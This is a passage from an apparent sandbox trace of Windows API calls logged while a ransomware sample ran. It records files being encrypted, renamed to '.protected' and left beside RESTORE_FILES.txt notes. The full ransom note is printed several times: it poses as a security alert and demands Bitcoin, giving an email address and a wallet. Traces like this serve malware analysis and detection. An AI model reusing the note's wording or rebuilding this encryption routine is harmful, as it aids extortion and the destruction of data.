liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.698] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.699] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.699] CloseHandle (hObject=0x150) returned 1 [0054.700] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.protected") returned 95 [0054.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.protected")) returned 1 [0054.707] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0054.707] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0054.707] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\RESTORE_FILES.txt") returned 93 [0054.707] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0054.707] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0054.707] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0054.708] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0054.708] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0054.708] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0054.708] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0054.708] CloseHandle (hObject=0xb4) returned 1 [0054.709] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="Program Files") returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="Program Files (x86)") returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="$Recycle.bin") returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="System Volume Information") returned -1 [0054.709] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned 75 [0054.709] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0054.709] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0054.709] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*") returned 77 [0054.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0054.709] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0054.709] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0054.709] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0054.709] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0054.709] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0054.709] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\.") returned 77 [0054.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.709] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.709] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0054.709] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0054.709] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0054.709] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0054.709] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0054.710] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\..") returned 78 [0054.710] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0054.710] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.710] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files") returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files (x86)") returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0054.710] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.710] StrStrIW (lpFirst="Proof.cab", lpSrch=".protected") returned 0x0 [0054.710] lstrcmpW (lpString1="Proof.cab", lpString2="RESTORE_FILES.txt") returned -1 [0054.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.710] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.711] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.711] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0054.711] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.711] StrStrW (lpFirst="Proof.cab", lpSrch=".rar") returned 0x0 [0054.711] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.711] StrStrW (lpFirst="Proof.cab", lpSrch=".zip") returned 0x0 [0054.711] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.720] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.720] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.720] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.720] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.759] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.759] CloseHandle (hObject=0x150) returned 1 [0055.273] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.protected") returned 95 [0055.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.protected")) returned 1 [0055.273] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files") returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files (x86)") returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0055.273] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.273] StrStrIW (lpFirst="Proof.msi", lpSrch=".protected") returned 0x0 [0055.273] lstrcmpW (lpString1="Proof.msi", lpString2="RESTORE_FILES.txt") returned -1 [0055.273] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.273] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.274] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.274] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.274] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0055.274] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.274] StrStrW (lpFirst="Proof.msi", lpSrch=".rar") returned 0x0 [0055.274] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.274] StrStrW (lpFirst="Proof.msi", lpSrch=".zip") returned 0x0 [0055.274] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.275] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.276] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.276] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.276] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.295] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.295] CloseHandle (hObject=0x150) returned 1 [0055.328] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.protected") returned 95 [0055.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.protected")) returned 1 [0055.328] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.328] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0055.328] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files") returned 1 [0055.329] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files (x86)") returned 1 [0055.329] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0055.329] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0055.329] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrIW (lpFirst="Proof.xml", lpSrch=".protected") returned 0x0 [0055.329] lstrcmpW (lpString1="Proof.xml", lpString2="RESTORE_FILES.txt") returned -1 [0055.329] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.329] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.329] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.329] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0055.329] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrW (lpFirst="Proof.xml", lpSrch=".rar") returned 0x0 [0055.329] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrW (lpFirst="Proof.xml", lpSrch=".zip") returned 0x0 [0055.329] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x5b1, lpOverlapped=0x0) returned 1 [0055.380] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.381] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x5b1, lpOverlapped=0x0) returned 1 [0055.381] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.381] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.381] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.381] CloseHandle (hObject=0x150) returned 1 [0055.384] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.protected") returned 95 [0055.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.protected")) returned 1 [0055.391] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0055.391] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0055.391] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\RESTORE_FILES.txt") returned 93 [0055.391] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0055.392] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0055.392] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0055.392] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0055.393] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0055.393] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0055.393] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0055.393] CloseHandle (hObject=0xb4) returned 1 [0055.393] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="Program Files") returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="Program Files (x86)") returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="$Recycle.bin") returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="System Volume Information") returned -1 [0055.393] wnsprintfW (in: 